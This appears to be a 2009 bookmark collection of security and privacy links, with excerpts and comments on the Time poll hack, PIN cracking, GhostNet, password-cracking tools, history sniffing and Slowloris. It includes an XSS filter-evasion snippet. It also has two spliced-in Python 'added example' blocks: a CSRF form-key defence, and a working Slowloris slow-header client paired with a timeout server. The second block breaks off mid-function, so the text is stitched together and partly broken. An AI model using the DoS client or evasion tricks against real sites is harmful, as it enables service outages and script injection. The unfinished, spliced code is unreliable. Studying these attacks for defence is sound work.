In "the Time.com 100 Poll where millions have voted on who are the world’s most influential people in government, science, technology and the arts ... we find a Message embedded in the results ... Looking at the first letters of each of the top 21 leading names in the poll we find the message “marblecake, also the game”. The poll announces (perhaps subtly) to the world, that the most influential are not the Obamas, Britneys or the Rick Warrens of the world, the most influential are an extremely advanced intelligence: the hackers. ... At the core of the hack is the work of a dozen or so, backed by an army of a thousand who downloaded and ran the autovoters and also backed by an untold number of others that unwittingly fell prey to the spam url autovoters. So why do they do it? Why do they write code, build complex applications, publish graphs - why do they organize a team that is more effective than most startup companies? Says Zombocom: “For the lulz”."
Anon hacks Time's 100 Poll so hard
There’s a scene toward the end of the book Contact by Carl Sagan, where the protagonist Ellie Arroway finds a Message embedded deep in the digits of PI. The Message is perhaps an artifact of an extremely advanced intelligence that apparently manipulated one of the fundamental constants of the universe as a testament to their power as they wove space and time. I’m reminded of this scene by the Time.com 100 Poll where millions have voted on who are the world’s most influential people in government, science, technology and the arts. Just as Ellie found a Message embedded in PI, we find a Message embedded in the results of this poll. Looking at the first letters of each of the top 21 leading names in the poll we find the message “marblecake, also the game”. The poll announces (perhaps subtly) to the world, that the most influential are not the Obamas, Britneys or the Rick Warrens of the world, the most influential are an extremely advanced intelligence: the hackers. At 4AM this mor
John Goekler: The Most Dangerous Person in the World?
http://www.counterpunch.org/goekler03242009.html
I'm not sure if the argument is right; many people die from heart disease, but I don't think we can say that better diet and exercise would have prevented 100% of these deaths.
o3 magazine | Open Source SSL Acceleration
http://www.o3magazine.com/4/a/0/2.html
A look at utilizing Open Source projects to build an SSL Accelerator for Web Servers that rivals even the most expensive commercial solutions. Advanced SSL Acceleration, Layer 7 URL Processing and Web Acceleration through gzip off-loading.
PIN Crackers Nab Holy Grail of Bank Card Security | Threat Level from Wired.com
http://blog.wired.com/27bstroke6/2009/04/pins.html
movement in the banking security industry
Hackers are getting our bank security pin codes!
Hackers have crossed into new frontiers by devising sophisticated ways to steal large amounts of personal identification numbers, or PINs, protecting credit and debit cards, says an investigator. The attacks involve both unencrypted PINs and encrypted PINs that attackers have found a way to crack, according to an investigator behind a new report looking at the data breaches.
Some of the attacks involve grabbing unencrypted PINs, while they sit in memory on bank systems during the authorization process. But the most sophisticated attacks involve encrypted PINs. Sartin says the latter attacks involve a device called a hardware security module (HSM), a security appliance that sits on bank networks and on switches through which PIN numbers pass on their way from an ATM or retail cash register to the card issuer. The module is a tamper-resistant device that provides a secure environment for certain functions, such as encryption and decryption, to occur. According to the payment-card industry, or PCI, standards for credit card transaction security, PIN numbers are supposed to be encrypted in transit, which should theoretically protect them if someone intercepts the data. The problem, however, is that a PIN must pass through multiple HSMs across multiple bank networks en route to the customer's bank. These HSMs are configured and managed d
Yves & TWA (comments) say this article has some fact checking issues
According to the payment-card industry, or PCI, standards for credit card transaction security, PIN numbers are supposed to be encrypted in transit, which should theoretically protect them if someone intercepts the data. The problem, however, is that a PIN must pass through multiple HSMs across multiple bank networks en route to the customer's bank. These HSMs are configured and managed differently, some by contractors not directly related to the bank. At every switching point, the PIN must be decrypted, then re-encrypted with the proper key for the next leg in its journey, which is itself encrypted under a master key that is generally stored in the module or in the module's application programming interface, or API.
The Untold Story of the World's Biggest Diamond Heist
http://www.wired.com/politics/law/magazine/17-04/ff_diamonds?currentPage=1
Leonardo Notarbartolo strolls into the prison visiting room trailing a guard as if the guy were his personal assistant. The other convicts in this eastern Belgian prison turn to look. Notarbartolo nods and smiles faintly, the laugh lines crinkling around his blue eyes. Though he's an inmate and wears the requisite white prisoner jacket, Notarbartolo radiates a sunny Italian charm. A silver Rolex peeks out from under his cuff, and a vertical strip of white soul patch drops down from his lower lip like an exclamation mark.
Pretty amazing account of a diamond heist in Antwerp. I imagine that various Hollywood types are scrabbling for the rights to produce "Notarbartolo's Five" even as I type this...
Nice story about a big "Ocean's 11"-style vault break-in at the Antwerp Diamond Centre
Twitter API Wiki / Sign in with Twitter
http://apiwiki.twitter.com/Sign-in-with-Twitter
pattern of authentication that allows users to connect their Twitter account with third-party services in as little as one click. It utilizes OAuth and although the flow is very similar, the authorization URL and workflow differs slightly as described below.
Use your twitter account as an openID account to sign-in
Joe Tech » How to Crack the Account Password on Any Operating System
http://www.joetech.com/2009/01/29/how-to-crack-the-account-password-on-any-operating-system/
KON-BOOT - ULTIMATE LINUX HACKING UTILITY :-)
http://piotrbania.com/all/kon-boot/
Nifty utility to become root on a box.
A Guide to Protecting Your Online Identity
http://mashable.com/2009/04/21/protecting-online-identity/
Being online is like being in public. Nearly anything that gets posted can come back to haunt you. Here is a guide to protecting your online identity.
Bruce Perens - A Cyber-Attack on an American City
http://perens.com/works/articles/MorganHill/
good content - horrible design makes me not want to read it
by Bruce Perens
JavaScript for hackers - Opera Developer Community
http://dev.opera.com/articles/view/opera-javascript-for-hackers-1/
Introduction I love to use JavaScript in unexpected ways, to create code that looks like it shouldn't work but does, or produces some unexpected behavior. This may sound trivial, but the results I've found lead to some very useful techniques. Each of the techniques described can be used for XSS filter evasion, which was my original intention when developing them. However, learning such JavaScript can dramatically increase your knowledge of the language, helping you become better at cleaning up input, and increase web application security. So read on and enjoy my weird and wonderful JavaScript hacks. RegExp replace can execute code When using regular expressions with replace the second argument supports a function assignment. In Opera it seems you can use this argument to execute code. For example, check out the code snippet below: 'XSS'.replace(/XSS/g,alert) This results in alert('XSS'); this works because the match from the RegExp is passed to the alert function as an argument. N
18 Useful Plugins & Hacks To Protect Your WordPress Blog | MakeUseOf.com
http://www.makeuseof.com/tag/18-useful-plugins-and-hacks-to-protect-your-wordpress-blog/
Lifehacker - Five Best Malware Removal Tools - Malware Removal
http://lifehacker.com/5227896/five-best-malware-removal-tools
The internet—unfortunately—isn't a never-ending buffet of secure open-source software and Bollywood-style musicals starring LOLCats. There are people and organizations that delight in stealing your personal data, hijacking your computer, and making a general nuisance of themselves through malicious software. This week we're highlighting the top five tools for removing software with ill-intentions from your PC.
How to Bypass Firewalls & Get into Blocked Websites in School or at Work with FreeProxy (Windows) | MakeUseOf.com
http://www.makeuseof.com/tag/how-to-get-into-blocked-websites-in-school-with-freeproxy/
moot wins, Time Inc. loses « Music Machinery
http://musicmachinery.com/2009/04/27/moot-wins-time-inc-loses/
A team of pranksters found a way to control the Time top 100 influential people list... I guess this demonstrates that they are in fact "influential"...
programming hacking
FACEBOOK FAIL: How to Use Facebook Privacy Settings and Avoid Disaster
http://mashable.com/2009/04/28/facebook-privacy-settings/
Oooh. You need this handy guide from mashable!
BlueServo
http://blueservo.net/
Project described in the Age, volunteer border watchers for USA-Mexico border
The Texas Border Sheriff's Coalition (TBSC) has joined BlueServoSM in a public-private partnership to deploy the Virtual Community Watch, an innovative real-time surveillance program designed to empower the public to proactively participate in fighting border crime. The TBSC BlueServoSM Virtual Community WatchSM is a network of cameras and sensors along the Texas-Mexico border that feeds live streaming video to www.BlueServo.net. Users will log in to the BlueServoSM website and directly monitor suspicious criminal activity along the border via this virtual fenceSM.
XSS (Cross Site Scripting) Prevention Cheat Sheet - OWASP
http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
XSS (Cross Site Scripting)
Panda Cloud Antivirus FREE - The first free cloud antivirus against viruses, spyware, rootkits and adware
http://www.cloudantivirus.com/
PHP, Web and IT stuff » Blog Archive » How to check if an email address exists without sending an email?
http://www.webdigi.co.uk/blog/2009/how-to-check-if-an-email-address-exists-without-sending-an-email/
How to stop the drug wars | The Economist
http://www.economist.com/opinion/displayStory.cfm?story_id=13237193
How to block direct linking (hotlinking) of images and other files | coliss
http://coliss.com/articles/build-websites/operations/stop-image-hotlinking-with-htaccess.html
A small .htaccess tip
.htaccess
Securing a Web server
http://www.ibm.com/developerworks/web/library/wa-secureweb/?ca=dgr-jw64Web-Secure&S_TACT=105AGY46&S_CMP=grsitejw64
from ibm developerworks
Prey: And track your stolen computer | bootlog
http://bootlog.org/blog/linux/prey-stolen-laptop-tracking-script
"Prey is a small and very, very simple application that collects a batch of information from your computer and sends it to an email address you have defined beforehand. The idea is that you install it on your laptop so that, when the day comes (hopefully never) that the machine disappears, you have more information to track it down, whether by its IP, the name of the WiFi network it is connected to, or a photo of the impostor."
Prey, a program that helps you track a computer when it gets stolen
If you ask me now, I would have preferred that my ex-ex-notebook had died in a big, big explosion. A thousand times that rather than having it disappear one da…
Lifehacker - Motion Detection Is an Effective, Dead Simple Security Camera App - Featured Windows Download
http://lifehacker.com/5233052/motion-detection-is-an-effective-dead-simple-security-camera-app
Windows only: Motion Detection is a free application that turns your webcam into a motion-sensing security camera in just a few clicks.
Start Panicking!
http://startpanic.com/
Hiromitsu Takagi@Home Diary - I tried tracking Yamanote Line boarding and alighting patterns with Bluetooth , Walking through the ubiquitous society (6) Bluetooth's "Make device public" / "Make discoverable"..
http://takagi-hiromitsu.jp/diary/20090301.html#p01
Yikes, yikes
I wrote a program that logs the responses to Bluetooth device inquiries and rode the Yamanote Line around four times.
Office of the Privacy Commissioner - Deep Packet Inspection
http://dpi.priv.gc.ca/
Whilst technically possible for some time now, the use and ethics of DPI need careful consideration.
Canada has been investigating several complaints involving ISP use of deep packet inspection technology.
SpyMe Tools - Monitor Registry & File System Changes
http://www.lcibrossolutions.com/spyme_tools.htm
10 Password Strength Meter Scripts For A Better Registration Interface
http://www.webresourcesdepot.com/10-password-strength-meter-scripts-for-a-better-registration-interface/
For membership-oriented websites, registration forms are one of the most important parts. A problematic experience, even if the sign-up is completed, will place a "question mark" to the visitor or vice-versa. And, it is also the first step where you can show that you care about the security of the website & all the data collected. Although you can control/improve the security of the website, it is sometimes the weak passwords used that may have unwanted consequences. Guiding users to have a strong password with the help of password strength meters, besides being an easy process, will help improve the security of the whole & show that the website pays attention to it...
Schneier on Security: Privacy in the Age of Persistence
http://www.schneier.com/blog/archives/2009/02/privacy_in_the.html
"Cardinal Richelieu famously said: 'If one would give me six lines written by the hand of the most honest man, I would find something in them to have him hanged.' When all your words and actions can be saved for later examination, different rules have to apply."
Schneier says privacy is quickly disappearing and we're ignoring it. It's like pollution at the beginning of the century: we're ignoring it now because it's small but soon we'll realize it was a big problem that should have been nipped in the bud. Also, if every conversation is recorded we have to change our standards accordingly; eg: how information is considered in a court.
"Society works precisely because conversation is ephemeral; because people forget, and because people don't have to justify every word they utter. ... Privacy isn't just about having something to hide; it's a basic right that has enormous value to democracy, liberty, and our humanity. ... Just as we look back at the beginning of the previous century and shake our heads at how people could ignore the pollution they caused, future generations will look back at us – living in the early decades of the information age – and judge our solutions to the proliferation of data. We must, all of us together, start discussing this major societal change and what it means. And we must work out a way to create a future that our grandchildren will be proud of."
Beautiful essay by Bruce Schneier on the challenges of our time due to data collection, the "pollution" of the information age. Tweeted by Thomas Kriese.
"Cardinal Richelieu famously said: 'If one would give me six lines written by the hand of the most honest man, I would find something in them to have him hanged.' When all your words and actions can be saved for later examination, different rules have to apply." This is especially important for those who say that they have nothing to hide. That misses the point.
Welcome to the future, where everything about you is saved. A future where your actions are recorded, your movements are tracked, and your conversations are no longer ephemeral. A future brought to you not by some 1984-like dystopia, but by the natural tendencies of computers to produce data. Data is the pollution of the information age. It's a natural byproduct of every computer-mediated interaction. It stays around forever, unless it's disposed of. It is valuable when reused, but it must be done carefully. Otherwise, its after effects are toxic. And just as 100 years ago people ignored pollution in our rush to build the Industrial Age, today we're ignoring data in our rush to build the Information Age. Increasingly, you leave a trail of digital footprints throughout your day.
graphpaper.com - Who Watches the Watchman?
http://www.graphpaper.com/2009/05-02_who_watches_the_watchman
Let’s say you own a big building full of valuable stuff. How do you make sure that the night watchman patrolling your factory floor or museum galleries after closing time actually makes his rounds? How do you know he’s inspecting every hallway, floor, and stairwell in the facility? How do you know he (or she) is not just spending every night sleeping at his desk? An elegant solution, designed and patented in 1901 by the German engineer A.A. Newman, is called the “watchclock”. It’s an ingenious mechanical device, slung over the shoulder like a canteen and powered by a simple wind-up spring mechanism. It precisely tracks and records a night watchman’s position in both space and time for the duration of every evening. It also generates a detailed, permanent, and verifiable record of each night’s patrol.
"But the watchclock is another kind of interaction design, one whose function corrals the user into a single, linear, constrained sort of behavior. The night watchman has a fundamental social constraint — the desire to not get fired from their job. This constraint allows the watchclock patrol system to work so effectively (some would say insidiously) as an interaction design instrument of control."
"How do you make sure that the night watchman patrolling your factory floor or museum galleries...actually makes his rounds? How do you know he’s inspecting every hallway, floor & stairwell? How do you know he is not just spending every night sleeping at his desk? If you’re a technology designer, you might suggest using surveillance cameras or even GPS to track his location each night, right? But let’s make this interesting...go...back...[to]1900. What could you possibly do in 1900 to be absolutely sure a night watchman was making his full patrol? An elegant solution, designed and patented in 1901 by the German engineer A.A. Newman, is called the “watchclock”. It’s an ingenious mechanical device, slung over the shoulder like a canteen and powered by a simple wind-up spring mechanism. It precisely tracks and records a night watchman’s position in both space and time for the duration of every evening. It also generates a detailed, permanent & verifiable record of each night’s patrol."
Privacychoice.net
http://www.privacychoice.net/
opt out of internet ads
Disable tracking cookies
Welcome to the Phoenix Freeze — Phoenix Freeze
http://www.phoenixfreeze.com/
14 day trial then $10 to purchase. No Win7 or 64 bit support as of 5-13-09
lock tool
Mobile phone bluetooth enabled security which locks itself as you walk away with your Blackberry or iPhone and unlocks as you return.
Phoenix Freeze enables you to automatically lock and unlock your laptop with just your cell phone. Save battery life and protect your files just by walking away.
Supposedly has better proximity control features, but it replaces the winlogon GINA, supposedly has BIOS compatibility issues, continuously broadcasts so it exposes you, and cannot work with a bluetooth mouse or keyboard...
Put your computer into hibernation when a Bluetooth source, for example your mobile phone, moves away
Often the best ideas are the simplest. A laptop which locks itself as you walk away with your Blackberry® or iPhone™ and unlocks as you return
What is the "clickjacking" attack that affects all major browsers
http://internet.watch.impress.co.jp/cda/news/2009/03/03/22653.html
Someone really thought this method up……
Weblog for dkg - HOWTO prep for migration off of SHA-1 in OpenPGP
http://www.debian-administration.org/users/dkg/weblog/48
Last week at eurocrypt, a small group of researchers announced a fairly serious attack against the SHA-1 digest algorithm, which is used in many cryptosystems, including OpenPGP. The general consensus is that we should be "moving in an orderly fashion toward the theater exits," deprecating SHA-1 where possible with an eye toward abandoning it soon (one point of reference: US gov't federal agencies have been directed to cease all reliance on SHA-1 by the end of 2010, and this directive was issued before the latest results).
Stuff I ought to do
Tips for a Debian GNU/Linux System Administrator.
10 Things to Check Before Using a CAPTCHA
http://www.sitepoint.com/blogs/2009/05/14/captcha-alternatives/
Who Protects The Internet? | Popular Science
http://www.popsci.com/scitech/article/2009-03/who-protects-intrnet
how it works
"'There is no time for celebration when we fix a cable,' Rennie says. 'There is lots of pressure from cable owners to move quickly. They are losing revenue.'" Do they really break that often… (well, I suppose they do)
"For the past five years, John Rennie has braved the towering waves of the North Atlantic Ocean to keep your e-mail coming to you. As chief submersible engineer aboard the Wave Sentinel, part of the fleet operated by U.K.-based undersea installation and maintenance firm Global Marine Systems, Rennie--a congenial, 6'4", 57-year-old Scotsman--patrols the seas, dispatching a remotely operated submarine deep below the surface to repair undersea cables."
The Beast
How undersea internet cables work
Pull up the wrong undersea cable, and the Internet goes dark in Berlin or Dubai. See our animated infographics of how the web works!
to be read
10 iptables rules you should know to secure your Linux machine - The IT industry - ZDNet Japan
http://japan.zdnet.com/sp/feature/07tenthings/story/0,3800082984,20389167,00.htm
Ruby on Rails Security Project - The Book
http://www.rorsecurity.info/the-book/
Matasano Chargen » Blog Archive » The Security Implications Of Google Native Client
http://www.matasano.com/log/1674/the-security-implications-of-google-native-client/
great technical read
Excellent article on the security implications not only of NaCl, but of Java and ActiveX and native X86 code.
What would it look like if Google tried to unseat Flash and obsolete all desktop applications?
Serious Form Security
http://css-tricks.com/serious-form-security/
Tips, Tricks, and Techniques on using Cascading Style Sheets (CSS)
php
http://lists.whatwg.org/pipermail/whatwg-whatwg.org/attachments/20080714/07ea5534/attachment.txt
good to animate
When you want a really strong security on the web, it's a good idea to use SSL. SSL can be used to encrypt your end to end connection to the web server, but you will need a client certificate for the possibility to verify you as who you are. The right way to get a certificate like this is for your browser to generate it! The private key should NEVER get out of the client machine. It should be generated and stored within the browser certificate store.
<form> <keygen name="pubkey" challenge="randomchars"> <input type="submit" name="createcert" value="Generate"> </form>
html <keygen>
No such thing as "deleted" on the Internet : Christopher Null : Yahoo! Tech
http://tech.yahoo.com/blogs/null/142366
photos stay on facebook for weeks
Eraser Portable | PortableApps.com - Portable software for USB drives
http://portableapps.com/apps/utilities/eraser_portable
Portable tool for erasing data
Tracking GhostNet: Investigating a Cyber Espionage Network
http://www.scribd.com/doc/13731776/Tracking-GhostNet-Investigating-a-Cyber-Espionage-Network
This report documents the GhostNet - a suspected cyber espionage network of over 1,295 infected computers in 103 countries, 30% of which are high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs. The capabilities of GhostNet are far-reaching. The report reveals that Tibetan computer systems were compromised giving attackers access to potentially sensitive information, including documents from the private office of the Dalai Lama. The report presents evidence showing that numerous computer systems were compromised in ways that circumstantially point to China as the culprit. But the report is careful not to draw conclusions about the exact motivation or the identity of the attacker(s), or how to accurately characterize this network of infections as a whole. The report argues that attribution can be obscured. The report concludes that who is in control of GhostNet is less important than the opportunity for generating st
Adblock Plus and (a little) more: Attention NoScript users
http://adblockplus.org/blog/attention-noscript-users
Recently I wrote about how not giving extension developers a good way to earn money might lead to very undesirable effects. The recent events give an impression of the kind of effects we should expect here. This is going to be about the popular NoScript extension which happens to make its money from ads.
"NoScript was extended by a piece of obfuscated (!) code to specifically target Adblock Plus and disable parts of its functionality" hoooboy
NoScript might be somewhat extreme but the “business offer” emails I occasionally see in my inbox make me think that we will see more of this. Companies start to recognize the potential of Firefox extensions and push extension authors into monetizing their extensions by questionable means — at the expense of the users. <how to disable the change page: see http://noscript.net/faq#qa2_5 it says: disable this feature by opening about:config (just like it was a normal web address) and toggling off the noscript.firstRunRedirection preference>
While the current state of affairs (NoScript’s manipulation of Adblock Plus is visible to the user if he knows where to look, it is documented and even reversible) is better than what we had before I still think that extensions manipulating other extensions to prevent them from doing their job is not where we want to be. NoScript might be somewhat extreme but the “business offer” emails I occasionally see in my inbox make me think that we will see more of this. Companies start to recognize the potential of Firefox extensions and push extension authors into monetizing their extensions by questionable means — at the expense of the users. Update (2009-05-02): Apparently, thanks to some pushing from AMO yet another NoScript version was released. This one supposedly no longer adds a filter subscription to Adblock Plus and also removes the one added by the previous versions. Update 3 (2009-05-04): NoScript author made an official statement on the events.
Important for anybody who thinks that NoScript is the saviour of your privacy: nope, not so much.
The largest security tools list
http://securitytoolslist.domandhost.com/
The Ultimate Lock Picker Hacks Pentagon, Beats Corporate Security for Fun and Profit
http://www.wired.com/techbiz/people/magazine/17-06/ff_keymaster?currentPage=all
…e locks and hotel room safes: These days, Tobias is attacking the lock famous for protecting places li…
Thinking like a criminal is Tobias' idea of fun. It makes him laugh. It has also made him money and earned him a reputation as something of the Rain Man of lock-breaking. Even if you've never heard of Tobias, you may know his work: He's the guy who figured out how to steal your bike, unlock your front door, crack your gun lock, blow up your airplane, and hijack your mail. Marc Weber Tobias has a name for the headache he inflicts on his targets: the Marc Weber Tobias problem.
"Marc Weber Tobias can pick, crack, or bump any lock. Now he wants to teach the world how to break into military facilities and corporate headquarters."
An article about someone with a gift for picking locks.
Tobias is laughing. And laughing. The effect is disconcerting. It's a bwa-ha-ha kind of evil mastermind laugh—appropriate if you've just sacked Constantinople, checkmated Deep Blue, or handed Superman a Dixie cup of kryptonite Kool-Aid, but downright scary in a midtown Manhattan restaurant during the early-bird special. Our fellow diners begin to stare. Tobias doesn't notice and wouldn't care anyway. He's as rumpled and wild as a nerdy grizzly bear. His place mat is covered in diagrams and sketched floor plans and scribbled arrows. His laugh fits him like a
10 Essential SQL Tips for Developers - Nettuts+
http://net.tutsplus.com/tutorials/other/10-essential-sql-tips-for-developers/
TOSBack | The Terms-Of-Service Tracker
http://www.tosback.org/timeline.php
privacy statement, terms of service
TOSBack keeps an eye on 44 website policies. Every time one of them changes, you'll see an update here.
Great new tool from the Electronic Frontier Foundation which allows you to see when a company's online Terms of Service/Privacy Policy is changed
The Terms-Of-Service Tracker
16 great .htaccess Tricks and Hacks ~ SoftwareRoxer
http://softwareroxer.blogspot.com/2009/06/16-great-htaccess-tricks-and-hacks.html
A short Apache config cookbook
Matasano Chargen » Blog Archive » Typing The Letters A-E-S Into Your Code? You’re Doing It Wrong!
http://www.matasano.com/log/1749/typing-the-letters-a-e-s-into-your-code-youre-doing-it-wrong/
A-E
UTF8Encoding
Professional crypto people don’t even get this stuff right. But if you have to encrypt something, you might as well use something that has already been tested.
Matasano Chargen
Annoyances.org - Remove the Microsoft .NET Framework Assistant (ClickOnce) Firefox Extension
http://annoyances.org/exec/show/article08-600
Remove the Microsoft .NET Framework Assistant (ClickOnce) Firefox Extension
The Microsoft .NET Framework 3.5 Service Pack 1 update, pushed through the Windows Update service to all recent editions of Windows in February 2009, installs the Microsoft .NET Framework Assistant Firefox extension without asking your permission.
do you know anything about this?
Microsoft .NET Framework 3.5 Service Pack 1 installs a massive security vulnerability in Firefox, without asking for permission. How to remove it
Moserware: The First Few Milliseconds of an HTTPS Connection
http://www.moserware.com/2009/06/first-few-milliseconds-of-https.html
Convinced from spending hours reading rave reviews, Bob eagerly clicked "Proceed to Checkout" for his gallon of Tuscan Whole Milk and... Whoa! What just happened?
How to disable the Autorun functionality in Windows
http://support.microsoft.com/kb/967715
The purpose of Autorun
The main purpose of Autorun is to provide a software response to hardware actions that you start on a computer. Autorun has the following features:
* Double-Click
* Contextual Menu
* AutoPlay
These features are typically called from removable media or from network shares. During AutoPlay, the Autorun.inf file from the media is parsed. This file specifies which commands the system runs. Many companies use this functionality to start their installers.
How to disable the Autorun functionality
Cryptographic Right Answers
http://www.daemonology.net/blog/2009-06-11-cryptographic-right-answers.html
"list of recommendations for using cryptography which, if followed, will make sure you get things right in the vast majority of situations"
Thanks to my background as FreeBSD Security Officer, as a cryptographic researcher, and as the author of the Tarsnap secure online backup system, I am frequently asked for advice on using cryptography as a component in secure systems. While some people argue that you should never use cryptographic primitives directly and that trying to teach people cryptography just makes them more likely to shoot themselves in their proverbial feet, I come from a proud academic background and am sufficiently optimistic about humankind that I think it's a good idea to spread some knowledge around. In light of this, I've put together a list of "Cryptographically Right Answers" -- which is to say, a list of recommendations for using cryptography which, if followed, will make sure you get things right in the vast majority of situations.
Recommendations about cryptography
Assembly Primer for Hackers (Part 1) System Organization Tutorial
http://www.securitytube.net/Assembly-Primer-for-Hackers-(Part-1)-System-Organization-video.aspx
How to Add Simple Permissions into Your Simple App. Also, Thoughtbot Rules! // RailsTips by John Nunemaker
http://railstips.org/2009/4/20/how-to-add-simple-permissions-into-your-simple-app-also-thoughtbot-rules
I didn't realize the automatic boolean attributes part.
how to use mixins in Rails, with loads of useful stuff about testing at the end
Shoulda examples
bitblinder
http://www.bitblinder.com/
Secure Your Forms With Form Keys - Nettuts+
http://net.tutsplus.com/tutorials/php/secure-your-forms-with-form-keys/
this bookmark brought from the del.icio.us home.
Security is a hot topic. Ensuring that your websites are secure is extremely important for any web application. In fact, I spend 70% of my time securing my
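The form-key pattern the tutorial describes, as an added example in Python rather than the tutorial's PHP (this is not the article's code): a random per-form key is stored server-side in the session and echoed in a hidden field, then checked in constant time, consumed on first use and expired after a fixed time. The session dict, the form names, the `handle_post` glue and the 600-second lifetime are assumptions for the demo.

```python
import hmac
import secrets
import time

FORM_KEY_TTL = 600   # seconds a key stays valid (assumption for the demo)


def issue_form_key(session, form_name, now=None):
    """Mint a fresh random key for one form, remember it in the server-side session
    (a dict stands in for the PHP session here) and return it for the hidden field."""
    now = time.time() if now is None else now
    key = secrets.token_hex(32)
    session.setdefault("form_keys", {})[form_name] = (key, now)
    return key


def hidden_field(key):
    """The markup that carries the key back; hex needs no HTML escaping."""
    return '<input type="hidden" name="form_key" value="%s">' % key


def check_form_key(session, form_name, submitted, now=None):
    """Accept a submission only if a key was issued for this form in this session,
    it has not expired, and the submitted value matches it in constant time.
    A key is consumed on success, so a captured request cannot be replayed."""
    now = time.time() if now is None else now
    keys = session.get("form_keys", {})
    entry = keys.get(form_name)
    if entry is None or not isinstance(submitted, str):
        return False          # forged cross-site POST: no key at all, or wrong type
    key, issued = entry
    if now - issued > FORM_KEY_TTL:
        del keys[form_name]   # stale form: the user has to reload it
        return False
    if not hmac.compare_digest(key.encode(), submitted.encode()):
        return False
    del keys[form_name]       # single use
    return True


def handle_post(session, form_name, form_data, now=None):
    """Glue as a request handler would use it: reject before touching the payload."""
    if not check_form_key(session, form_name, form_data.get("form_key"), now):
        return 403, "invalid or missing form key"
    return 200, "comment %r accepted" % form_data.get("comment", "")
```

The key is compared with `hmac.compare_digest` rather than `==` so that a mismatch takes the same time whatever the position of the first differing byte, and it is deleted on success so that the same request body cannot be submitted twice.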
Security Fix - Microsoft Update Quietly Installs Firefox Extension
http://voices.washingtonpost.com/securityfix/2009/05/microsoft_update_quietly_insta.html
firefox; beware of security update
see comments
"I'm here to report a small side effect from installing this service pack that I was not aware of until just a few days ago: Apparently, the .NET update automatically installs its own Firefox add-on that is difficult -- if not dangerous -- to remove, once installed. Annoyances.org, which lists various aspects of Windows that are, well, annoying, says "this update adds to Firefox one of the most dangerous vulnerabilities present in all versions of Internet Explorer: the ability for Web sites to easily and quietly install software on your PC." I'm not sure I'd put things in quite such dire terms, but I'm fairly confident that a decent number of Firefox for Windows users are rabidly anti-Internet Explorer, and would take umbrage at the very notion of Redmond monkeying with the browser in any way. Big deal, you say? I can just uninstall the add-on via Firefox's handy Add-ons interface, right? Not so fast. The trouble is, Microsoft has disabled the "uninstall" button on the extension."
Microsoft Update Quietly Installs Firefox Extension http://is.gd/KYiM [from http://twitter.com/sanjayayogi/statuses/1985287536]
Microsoft Update Quietly Installs Firefox Extension A routine security update for a Microsoft Windows component installed on tens of millions of computers has quietly installed an extra add-on for an untold number of users surfing the Web with Mozilla's Firefox Web browser.
From a clean install of Mac OS X Leopard to a usable, configured environment (June 2009 edition) - Hatena::Diary::Ubuntu
http://d.hatena.ne.jp/Ubuntu/20090615/1244993103
Anglicise the folder names: change 「ダウンロード」 and 「ライブラリ」 to "Downloads" and "Library" by deleting the .localized file under each of those directories.
Thorough on the security-related settings.
Sniffing Browser History with NO Javascript!
http://www.making-the-web.com/misc/sites-you-visit/nojs/
Uses HTML and CSS to determine your browsing history. Slowish but effective.
This is a method of sniffing your browsing history without using Javascript. If you haven't cleaned your browsing history recently, just click "Start Scan" and the system will get to work. If this doesn't shock you, it should: websites are not supposed to see this information. It has potential for anyone, in particular advertisers, to view your history and profile you.
Rakuten found to be selling downloads of users' personal information, including email addresses, at 10 yen per record - GIGAZINE
http://gigazine.net/index.php?/news/comments/20090527_rakuten_csv/
In addition, according to a tip, the order confirmation email that is sent automatically to the purchaser is also copied to the shop: the sender is Rakuten Ichiba, the To address is the purchaser's, and the shop's address is on CC. A shop could therefore obtain customer information free of charge simply by harvesting customer email addresses from these messages by hand, and since software exists that manages orders from email, building a list is easy too.
Slowloris HTTP DoS
http://ha.ckers.org/slowloris/
perl -MCPAN -e 'install IO::Socket::INET'
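An added example, not from ha.ckers.org and not the Perl tool itself, showing in Python why the attack works and what defeats it: a client that trickles one header line at a time and never sends the blank line that ends the request, against a tiny server that gives every connection a fixed deadline to finish its headers. Without such a deadline the worker stays tied up for as long as the client keeps the socket open, which is how Slowloris exhausts a thread- or process-per-connection server with very little bandwidth; Apache's mod_reqtimeout enforces the same idea in production. The one-second deadline, the loopback address and the timing constants are assumptions for the demo.

```python
import socket
import threading
import time

HEADER_DEADLINE = 1.0    # seconds a client gets to finish its request headers (demo assumption)
MAX_HEADER_BYTES = 8192  # cap on header bytes we are willing to buffer


def serve_one(conn, deadline=HEADER_DEADLINE):
    """Read one request's headers. Return True if they arrived whole before the
    deadline; otherwise hang up, so a trickling client cannot hold a worker forever."""
    conn.settimeout(0.1)
    buf = b""
    start = time.monotonic()
    try:
        while b"\r\n\r\n" not in buf:
            if time.monotonic() - start > deadline or len(buf) > MAX_HEADER_BYTES:
                return False
            try:
                chunk = conn.recv(4096)
            except socket.timeout:
                continue            # nothing yet; re-check the deadline
            if not chunk:
                return False        # client went away
            buf += chunk
        conn.sendall(b"HTTP/1.1 200 OK\r\nContent-Length: 2\r\nConnection: close\r\n\r\nok")
        return True
    except OSError:
        return False
    finally:
        conn.close()


def start_server():
    """Thread-per-connection server on a random loopback port; returns (socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(16)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return              # listening socket closed: demo over
            threading.Thread(target=serve_one, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, srv.getsockname()[1]


def slowloris_client(port, interval=0.3, max_lines=20):
    """The Slowloris pattern: open a request, then keep sending one bogus header line
    per interval and never the blank line. Returns how many lines the server took
    before it dropped the connection (max_lines means it never did)."""
    s = socket.create_connection(("127.0.0.1", port))
    s.settimeout(0.1)
    sent = 0
    try:
        s.sendall(b"GET / HTTP/1.1\r\nHost: localhost\r\n")
        while sent < max_lines:
            time.sleep(interval)
            s.sendall(b"X-a: b\r\n")
            sent += 1
            try:
                if s.recv(1) == b"":   # EOF: the server hung up on us
                    break
            except socket.timeout:
                pass                   # still open, keep it busy
    except OSError:
        pass                           # reset / broken pipe: also the server hanging up
    finally:
        s.close()
    return sent


def normal_client(port):
    """A well-formed request must still be served while the slow one is being dropped."""
    s = socket.create_connection(("127.0.0.1", port))
    s.sendall(b"GET / HTTP/1.1\r\nHost: localhost\r\n\r\n")
    data = b""
    while True:
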